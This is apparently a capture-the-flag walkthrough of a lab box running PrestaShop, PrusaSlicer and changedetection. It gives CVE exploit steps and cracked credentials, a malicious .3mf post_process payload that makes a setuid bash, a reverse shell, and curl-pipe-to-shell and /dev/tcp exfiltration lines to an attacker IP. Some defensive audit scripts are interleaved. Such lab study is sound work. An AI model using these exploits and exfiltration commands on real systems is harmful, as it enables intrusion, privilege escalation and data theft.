Trickster

Recon

[embedded: nmap_scan.log]

HTTP (80)

Port 80 serves a placeholder page.

[Screenshot: Writeup.png]

Shop

[Screenshot: Writeup-1.png]

Creds: test:test:test02@trickster.htb:Password123$Lmao

PrestaShop is a freemium, open source e-commerce platform.

[Screenshot: Writeup-2.png]

Git Dump

Feroxbuster found http://shop.trickster.htb/.git/index

└─$ git-dumper http://shop.trickster.htb/ shop
[-] Testing http://shop.trickster.htb/.git/HEAD [200]
[-] Testing http://shop.trickster.htb/.git/ [200]
[-] Fetching .git recursively
...
Updated 1699 paths from the index

Hidden Admin Panel

Inside we get a bunch of default files and an admin634ewutrx1jgitlooaj directory, which should be the admin panel path.

http://shop.trickster.htb/admin634ewutrx1jgitlooaj/

[Screenshot: Writeup-3.png]

adam made changes:

commit 0cbc7831c1104f1fb0948ba46f75f1666e18e64c (HEAD -> admin_panel)
Author: adam <adam@trickster.htb>
Date:   Fri May 24 04:13:19 2024 -0400

    update admin pannel

Officially disclosed vulnerabilities: https://github.com/PrestaShop/PrestaShop/releases/tag/8.1.6

Doesn't work: (CVE-2024-36680) Improper neutralization of SQL parameter in Promokit.eu - Facebook module for PrestaShop

XSS -> RCE

XSS: CVE-2024-34716 – The Deceptive PNG Trap: Breaking Down the PNG-Driven Chain from XSS to Remote Code Execution on PrestaShop (<=8.1.5) PoC: https://github.com/aelmokhtar/CVE-2024-34716

As the blog says, make the changes to your exploit.html:

[Screenshot: Writeup-4.png]

Some changes are needed in exploit.py too (the proxies were added for debugging).

[Screenshot: Writeup-5.png]

Also put your own IP into the reverse shell inside the zip file! Once the zip is requested, the shell should come in quickly.

MySQL

www-data@trickster:~/prestashop/app/config$ cat parameters.php
<?php return array (
  'parameters' =>
  array (
    'database_host' => '127.0.0.1',
    'database_port' => '',
    'database_name' => 'prestashop',
    'database_user' => 'ps_user',
    'database_password' => 'prest@shop_o',
    'database_prefix' => 'ps_',
    'database_engine' => 'InnoDB',
    'mailer_transport' => 'smtp',
    'mailer_host' => '127.0.0.1',
    'mailer_user' => NULL,
    'mailer_password' => NULL,
    'secret' => 'eHPDO7bBZPjXWbv3oSLIpkn5XxPvcvzt7ibaHTgWhTBM3e7S9kbeB1TPemtIgzog',
    'ps_caching' => 'CacheMemcache',
    'ps_cache_enable' => false,
    'ps_creation_date' => '2024-05-25',
    'locale' => 'en-US',
    'use_debug_toolbar' => true,
    'cookie_key' => '8PR6s1SJZLPCjXTegH7fXttSAXbG2h6wfCD3cLk5GpvkGAZ4K9hMXpxBxrf7s42i',
    'cookie_iv' => 'fQoIWUoOLU0hiM2VmI1KPY61DtUsUx8g',
    'new_cookie_key' => 'def000001a30bb7f2f22b0a7790f2268f8c634898e0e1d32444c3a03f4040bd5e8cb44bdb57a73f70e01cf83a38ec5d2ddc1741476e83c45f97f763e7491cc5e002aff47',
    'api_public_key' => '-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAuSFQP3xrZccKbS/VGKMr
v8dF4IJh9F9NvmPZqiFNpJnBHhfWE3YVM/OrEREGKztkHFsQGUZXFIwiBQVs5kAG
5jfw+hQrl89+JRD0ogZ+OHUfN/CgmM2eq1H/gxAYfcRfwjSlOh2YzAwpLvwtYXBt
Scu6QqRAdotokqW2m3aMt+LV8ERdFsBkj+/OVdJ8oslvSt6Kgf39DnBpGIXAqaFc
QdMdq+1lT9oiby0exyUkl6aJU21STFZ7kCf0Secp2f9NoaKoBwC9m707C2UCNkAm
B2A2wxf88BDC7CtwazwDW9QXdF987RUzGj9UrEWwTwYEcJcV/hNB473bcytaJvY1
ZQIDAQAB
-----END PUBLIC KEY-----
',
    'api_private_key' => '-----BEGIN PRIVATE KEY-----
...
-----END PRIVATE KEY-----
',
  ),
);
www-data@trickster:~/prestashop/app/config$ mysql -u'ps_user' -p'prest@shop_o' prestashop -e 'SELECT email, passwd FROM ps_customer;'
+----------------------+--------------------------------------------------------------+
| email                | passwd                                                       |
+----------------------+--------------------------------------------------------------+
| adam@trickster.htb   | $2y$10$kY2G39RBz9P0S48EuSobuOJba/HgmQ7ZtajfZZ3plVLWnaBbS4gei |
| anonymous@psgdpr.com | $2y$10$054Mo38DcRSLaMX9OhT5UuhYSQvorGu8nZb9GubbAv3Roei6RS2QW |
| pub@prestashop.com   | $2y$10$Cw68h0u8YeP6IiYRRaOjQu4AV7X9BTQL3ZK4CtHU16PNDg7LB4mEG |
| test02@trickster.htb | $2y$10$T3rriOVB5f4N2ijQ4ypXaOjRAy0YxAXa/a2TOgrue2W1NgWSsrx0u |
+----------------------+--------------------------------------------------------------+
www-data@trickster:~/prestashop$ mysql -u'ps_user' -p'prest@shop_o' prestashop -e 'SELECT email, passwd FROM ps_employee;'
+---------------------+--------------------------------------------------------------+
| email               | passwd                                                       |
+---------------------+--------------------------------------------------------------+
| admin@trickster.htb | $2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C |
| james@trickster.htb | $2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm |
+---------------------+--------------------------------------------------------------+

SSH

James is the user on the box, so his hash is our target:

➜ .\john-1.9.0-jumbo-1-win64\run\john.exe .\hashes --wordlist=.\rockyou.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 16 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alwaysandforever (?)
1g 0:00:00:07 DONE (2024-09-22 01:26) 0.1421g/s 5270p/s 5270c/s 5270C/s baloon..EMILIO
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Creds: james:alwaysandforever
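Why james fell in seven seconds while the other accounts did not: his row carries $2a$04$, a bcrypt cost of 4 (16 rounds, matching john's "Cost 1 (iteration count) is 16"), while every other hash uses cost 10. An added audit script, not part of the writeup, run over the hashes dumped above; MIN_COST of 10 is an assumed policy floor, not something the page states:

```python
import re

# bcrypt modular-crypt format: $<version>$<cost>$<22-char salt><31-char digest>
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{53})$")

MIN_COST = 10  # assumed minimum acceptable work factor (2**10 rounds)


def parse_bcrypt(hash_str):
    """Return (version, cost, rounds) for a well-formed bcrypt hash, else None."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        return None
    version, cost = m.group(1), int(m.group(2))
    if not 4 <= cost <= 31:  # valid bcrypt cost range
        return None
    return version, cost, 2 ** cost


def audit(rows, min_cost=MIN_COST):
    """rows: iterable of (email, hash). Returns (email, reason) findings for
    hashes that are malformed or whose cost is below min_cost."""
    findings = []
    for email, h in rows:
        parsed = parse_bcrypt(h)
        if parsed is None:
            findings.append((email, "not a bcrypt hash"))
            continue
        _version, cost, rounds = parsed
        if cost < min_cost:
            findings.append((email, f"bcrypt cost {cost} ({rounds} rounds) below {min_cost}"))
    return findings


# Hashes copied from the ps_customer / ps_employee tables dumped above.
ROWS = [
    ("adam@trickster.htb", "$2y$10$kY2G39RBz9P0S48EuSobuOJba/HgmQ7ZtajfZZ3plVLWnaBbS4gei"),
    ("admin@trickster.htb", "$2y$10$P8wO3jruKKpvKRgWP6o7o.rojbDoABG9StPUt0dR7LIeK26RdlB/C"),
    ("james@trickster.htb", "$2a$04$rgBYAsSHUVK3RZKfwbYY9OPJyBbt/OzGw9UHi4UnlK6yG5LyunCmm"),
]

if __name__ == "__main__":
    for email, reason in audit(ROWS):
        print(f"{email}: {reason}")
```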

User.txt

james@trickster:~$ cat user.txt
f8120cf85a0e3bd98e4cab6122242713

Privilege Escalation

james@trickster:~$ curl 10.10.14.47/lp.sh|sh|tee /tmp/lp.log
...
╔══════════╣ Interfaces
# symbolic names for networks, see networks(5) for more information
link-local 169.254.0.0
docker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:4c:3e:57:d6  txqueuelen 0  (Ethernet)
        RX packets 90  bytes 5416 (5.4 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 10  bytes 420 (420.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.148.34  netmask 255.255.0.0  broadcast 10.129.255.255
        ether 00:50:56:94:7d:78  txqueuelen 1000  (Ethernet)
        RX packets 40223  bytes 12591817 (12.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 27575  bytes 8047886 (8.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 390010  bytes 630032318 (630.0 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 390010  bytes 630032318 (630.0 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

veth679c878: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        ether 8e:38:a4:a6:ab:8d  txqueuelen 0  (Ethernet)
        RX packets 10  bytes 708 (708.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 2  bytes 84 (84.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:37301         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
...
╔══════════╣ Checking if containerd(ctr) is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation
ctr was found in /usr/bin/ctr, you may be able to escalate privileges with it
ctr: failed to dial "/run/containerd/containerd.sock": connection error: desc = "transport: error while dialing: dial unix /run/containerd/containerd.sock: connect: permission denied"

╔══════════╣ Checking if runc is available
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation
runc was found in /usr/sbin/runc, you may be able to escalate privileges with it
...

Cronjobs

pspy shows some cronjobs running as root:

2024/09/21 21:43:23 CMD: UID=0     PID=1      | /sbin/init
2024/09/21 21:44:01 CMD: UID=0     PID=70504  | /usr/sbin/CRON -f -P
2024/09/21 21:44:01 CMD: UID=0     PID=70506  | /bin/bash /root/changedetection/backup_restore.sh
2024/09/21 21:44:01 CMD: UID=0     PID=70505  | /bin/sh -c /root/changedetection/backup_restore.sh > /dev/null
2024/09/21 21:44:01 CMD: UID=0     PID=70507  | /bin/bash /root/changedetection/backup_restore.sh
2024/09/21 21:44:01 CMD: UID=0     PID=70509  | awk {print $1}
2024/09/21 21:44:01 CMD: UID=0     PID=70510  | /bin/bash /root/changedetection/backup_restore.sh
...
2024/09/21 21:44:11 CMD: UID=1003  PID=70513  | /home/runner/prestashop/chromedriver --port=52695
2024/09/21 21:44:11 CMD: UID=1003  PID=70526  | /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.5 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.112 --initial-client-fd=6 --shared-client-connection
2024/09/21 21:44:11 CMD: UID=1003  PID=70525  | /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.A64L6p data:,
...
2024/09/21 21:45:01 CMD: UID=0     PID=70597  | /bin/bash /root/scripts/clean_up/clean_up.sh 

--remote-debugging-port=0 is interesting...

https://exploit-notes.hdks.org/exploit/linux/privilege-escalation/chrome-remote-debugger-pentesting/

Forwarding this port doesn't lead anywhere.

PrusaSlicer

Next interesting line is:

2024/09/21 21:44:01 CMD: UID=0     PID=70507  | /bin/bash /root/changedetection/backup_restore.sh

Because there's a prusaslicer binary in /opt.

james@trickster:/opt/PrusaSlicer$ ls -alh
total 81M
drwxr-xr-x 2 root root 4.0K Sep 13 12:24 .
drwxr-xr-x 5 root root 4.0K Sep 13 12:24 ..
-rwxr-xr-x 1 root root  81M Sep  6  2023 prusaslicer
-rw-r--r-- 1 root root 136K May 23 22:08 TRICKSTER.3mf

A *.3mf file is some kind of 3D object file...

[Screenshot: Writeup-6.png]

james@trickster:/opt/PrusaSlicer$ ./prusaslicer
DISPLAY not set, GUI mode not available.

PrusaSlicer-2.6.1+linux-x64-GTK2-202309060801 based on Slic3r (with GUI support)
https://github.com/prusa3d/PrusaSlicer

PrusaSlicer 2.6.1 - Arbitrary code execution

2.) PoC
==========================================================================================

For the linux PoC, this CLI command is enough to execute the payload contained in the project. './prusa-slicer -s code-exec-linux.3mf'. After slicing, a new file '/tmp/hax' will be created. This particular PoC contains this 'post_process' entry in the 'Slic3r_PE.config' file:

; post_process = "/usr/bin/id > /tmp/hax #\necho 'Here I am, executing arbitrary code on this host. Thanks for slicing (x_x)'>> /tmp/hax #"

Download the file

└─$ scp james@trickster.htb:/opt/PrusaSlicer/TRICKSTER.3mf ./TRICKSTER.3mf

Edit post_process in Metadata/Slic3r_PE.config. output_filename_format was causing errors, so I just left the base filename there.

; post_process = "install /bin/bash /tmp/rootbash -m 4777 # "
; output_filename_format = {input_filename_base}.gcode
└─$ scp ./TRICKSTER.3mf james@trickster.htb:/tmp/TRICKSTER.3mf
james@trickster:~$ /opt/PrusaSlicer/prusaslicer -s /tmp/TRICKSTER.3mf

The payload works, but the problem is that we ran it, not root... So no privesc yet...
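A defender-side check for the mechanism the advisory describes: a .3mf is a zip archive, and PrusaSlicer reads print settings, including post_process, from Metadata/Slic3r_PE.config inside it. This added example (not from the writeup or from PrusaSlicer) builds a constructed project in memory and reports any post-processing command before the file is sliced; the sample command is a harmless placeholder.

```python
import io
import zipfile

CONFIG_MEMBER = "Metadata/Slic3r_PE.config"

# Settings that make the slicer spawn a process; post_process is the one
# the PrusaSlicer 2.6.1 advisory above abuses.
EXEC_KEYS = ("post_process",)


def parse_slic3r_config(text):
    """Slic3r_PE.config lines look like '; key = value'. Return a dict."""
    settings = {}
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith(";") or "=" not in line:
            continue
        key, _, value = line[1:].partition("=")
        settings[key.strip()] = value.strip()
    return settings


def scan_3mf(data):
    """data: bytes of a .3mf archive. Returns (key, value) pairs for non-empty
    executable settings; raises ValueError if the config member is missing."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        if CONFIG_MEMBER not in zf.namelist():
            raise ValueError(f"{CONFIG_MEMBER} not present")
        settings = parse_slic3r_config(zf.read(CONFIG_MEMBER).decode("utf-8", "replace"))
    findings = []
    for key in EXEC_KEYS:
        value = settings.get(key, "")
        # An empty value ('""' or nothing) is the default and harmless.
        if value.strip('"').strip():
            findings.append((key, value))
    return findings


def build_sample_3mf(post_process):
    """Construct a minimal .3mf-shaped archive for testing (constructed, not a real model)."""
    config = (
        "; generated by PrusaSlicer (constructed sample)\n"
        f"; post_process = {post_process}\n"
        "; output_filename_format = {input_filename_base}.gcode\n"
        "; layer_height = 0.2\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("3D/3dmodel.model", "<model/>")
        zf.writestr(CONFIG_MEMBER, config)
    return buf.getvalue()


if __name__ == "__main__":
    print(scan_3mf(build_sample_3mf('"echo hello # placeholder"')))
```

Run it against a real project with `scan_3mf(open(path, "rb").read())` before slicing anything you did not create yourself.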

runc

Linpeas previously showed runc was available and pointed to HackTricks: https://book.hacktricks.xyz/linux-hardening/privilege-escalation/runc-privilege-escalation and https://dev.to/codeninjausman/hackthebox-htb-writeup-vessel-hard-10bb

Following the instructions, we get:

james@trickster:/tmp/t$ ps aux | grep runc
root       76436  0.0  0.3 1238400 12420 ?       Sl   22:40   0:00 /usr/bin/containerd-shim-runc-v2 -namespace moby -id ae5c137aa8efc8eee17e3f5e2f93594b6bfc9ea2d7b350faba36e80d588aa47c -address /run/containerd/containerd.sock

james@trickster:/tmp/t$ runc run moby
FATA[0000] nsexec-1[77070]: failed to unshare user namespace: Operation not permitted
FATA[0000] nsexec-0[77069]: failed to sync with stage-1: next state: Success
ERRO[0000] runc run failed: unable to start container process: can't get final child's PID from pipe: EOF

Docker

I wasn't able to find anything useful, and Docker kept bugging me, so I just decided to scan the whole network.

https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap

james@trickster:~$ /tmp/nmap -p- --min-rate 10000 172.17.0.1/16 -v -v -v -v
...
Nmap scan report for 172.17.255.254 [host down, received no-response]
Nmap scan report for 172.17.255.255 [host down, received net-unreach]
Initiating Connect Scan at 00:02
Scanning 2 hosts [65535 ports/host]
Discovered open port 80/tcp on 172.17.0.1
Discovered open port 22/tcp on 172.17.0.1
Discovered open port 5000/tcp on 172.17.0.2
Completed Connect Scan against 172.17.0.1 in 37.52s (1 host left)
Completed Connect Scan at 00:03, 37.52s elapsed (131070 total ports)
Nmap scan report for 172.17.0.1
Host is up, received syn-ack (0.0017s latency).
Scanned at 2024-09-21 23:57:17 UTC for 364s
Not shown: 65533 closed ports
Reason: 65533 conn-refused
PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Nmap scan report for 172.17.0.2
Host is up, received conn-refused (0.0018s latency).
Scanned at 2024-09-21 23:57:17 UTC for 364s
Not shown: 65534 closed ports
Reason: 65534 conn-refused
PORT     STATE SERVICE REASON
5000/tcp open  unknown syn-ack

Read data files from: /etc
Nmap done: 65536 IP addresses (2 hosts up) scanned in 363.82 seconds

Note: Probably would have been to scan /8 network 💀

Note (from _cutearmadillo_): You don't actually need to scan the network at all. The process list shows the PID of the container (containerd-shim-runc-v2), then you go check /proc/PID/net/arp. With ps -efj you also find the process running in the container and its PID, and then check the open port via /proc/PID/net/tcp (in hex).
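The /proc/PID/net/tcp route from the note above, as an added example that is not part of the writeup: the kernel prints each address as a native-endian (little-endian on this x86 box) 32-bit IPv4 word plus a port, both in hex, and the state column is a hex code. The decoder below runs over constructed sample lines in that file's layout and recovers the listening sockets.

```python
import socket
import struct

# State codes as printed in /proc/net/tcp (Linux include/net/tcp_states.h).
TCP_STATES = {
    0x01: "ESTABLISHED", 0x02: "SYN_SENT", 0x03: "SYN_RECV", 0x04: "FIN_WAIT1",
    0x05: "FIN_WAIT2", 0x06: "TIME_WAIT", 0x07: "CLOSE", 0x08: "CLOSE_WAIT",
    0x09: "LAST_ACK", 0x0A: "LISTEN", 0x0B: "CLOSING",
}


def decode_addr(hex_addr):
    """'0100007F:91B5' -> ('127.0.0.1', 37301).
    The IPv4 word is little-endian hex, so pack it as '<I' before inet_ntoa."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse /proc/<pid>/net/tcp contents into dicts (header line skipped)."""
    sockets = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 4:
            continue
        sockets.append({
            "local": decode_addr(fields[1]),
            "remote": decode_addr(fields[2]),
            "state": TCP_STATES.get(int(fields[3], 16), fields[3]),
            "inode": int(fields[9]) if len(fields) > 9 else None,
        })
    return sockets


def listening_ports(text):
    """Sorted (ip, port) tuples of sockets in LISTEN state."""
    return sorted(s["local"] for s in parse_proc_net_tcp(text) if s["state"] == "LISTEN")


# Constructed sample as it might look from inside the container's namespace:
# a service bound to 0.0.0.0:5000 (0x1388) and one established client.
SAMPLE = """  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:1388 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 020011AC:1388 010011AC:B6B6 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 20 4 30 10 -1
"""

if __name__ == "__main__":
    for ip, port in listening_ports(SAMPLE):
        print(f"LISTEN {ip}:{port}")
```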

changedetection

└─$ ssh james@trickster.htb -L 5000:172.17.0.2:5000

It asks for a password, and James's password works.

[Screenshot: Writeup-7.png]

Version is v0.45.20

changedetection < 0.45.20 - Remote Code Execution (RCE): CVE-2024-32651-changedetection-RCE

Remove the password authentication, because the script doesn't like it.

[Screenshot: Writeup-8.png]

Docker Shell

└─$ py CVE-2024-32651.py --url http://localhost:5000 --ip 10.10.14.47 --port 4444 --notification get://10.10.14.47
---
Now create a new file on server, then Recheck and then it gets triggered
---
└─$ listen
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.129.148.34:46942.
root@ae5c137aa8ef:/app# id
uid=0(root) gid=0(root) groups=0(root)

Note: Make sure to change the reddit URLs in the PoC to internal URLs; a simple HTTP server will do.

root@ae5c137aa8ef:/datastore# cat secret.txt;echo
5fce75c64d33acf05d2d3b21d29e693d992f240d5c440310cff3edfb743c64a5
root@ae5c137aa8ef:/datastore# tar -czvf data.tgz ./*
---
listen 4445 > data.tgz.base64
---
root@ae5c137aa8ef:/datastore# base64 data.tgz > /dev/tcp/10.10.14.47/4445
---
base64 -d data.tgz.base64 > data.tgz

Root (Unintended)

root@ae5c137aa8ef:~# ls -alh
total 36K
drwx------ 1 root root 4.0K Sep 13 12:24 .
drwxr-xr-x 1 root root 4.0K Sep 13 12:24 ..
-rw------- 1 root root  405 Sep 16 15:34 .bash_history
-rw-r--r-- 1 root root  571 Apr 10  2021 .bashrc
drwxr-xr-x 1 root root 4.0K Sep 13 12:24 .local
-rw-r--r-- 1 root root  161 Jul  9  2019 .profile
-rw-r--r-- 1 root root  254 Apr 10 04:57 .wget-hsts
root@ae5c137aa8ef:~# cat .bash_history
apt update
#YouC4ntCatchMe#
apt-get install libcap2-bin
capsh --print
clear
capsh --print
cd changedetectionio/

Creds: root:#YouC4ntCatchMe#

james@trickster:~$ su
Password:
root@trickster:~# id
uid=0(root) gid=0(root) groups=0(root)

Root.txt

root@trickster:~# cat root.txt
7e5354393df7a938ee6b7ec199173d06

Root (Intended)

└─$ sudo apt install brotli
└─$ pwd
//Trickster/www/data/Backups/changedetection-backup-20240830194841
└─$ unzip changedetection-backup-20240830194841.zip -d changedetection-backup-20240830194841
└─$ brotli -d changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt.br
└─$ grep -E 'user|pass' changedetection-backup-20240830194841 -Rain
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:27:                'database_user' => 'adam' ,                                                    
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:28:                'database_password' => 'adam_admin992' ,                                       
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:33:                'mailer_user' => NULL ,                                                        
changedetection-backup-20240830194841/b4a8b52d-651b-44bc-bbc6-f9e8c6590103/f04f0732f120c0cc84a993ad99decb2c.txt:34:                'mailer_password' => NULL ,                                                    
changedetection-backup-20240830194841/url-watches.json:145:            "password": false,
changedetection-backup-20240830194841/url-watches.json:332:            "removepassword_button": false

Creds: adam:adam_admin992

└─$ ssh adam@trickster.htb
adam@trickster.htb password: adam_admin992
adam@trickster:~$ sudo -l
Matching Defaults entries for adam on trickster:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User adam may run the following commands on trickster:
    (ALL) NOPASSWD: /opt/PrusaSlicer/prusaslicer

adam can run prusaslicer as root, so we go back and reuse the malicious *.3mf file from before for root.

adam@trickster:~$ sudo /opt/PrusaSlicer/prusaslicer -s /tmp/TRICKSTER.3mf
adam@trickster:~$ /tmp/rootbash -p
rootbash-5.1# id
uid=1002(adam) gid=1002(adam) euid=0(root) groups=1002(adam)
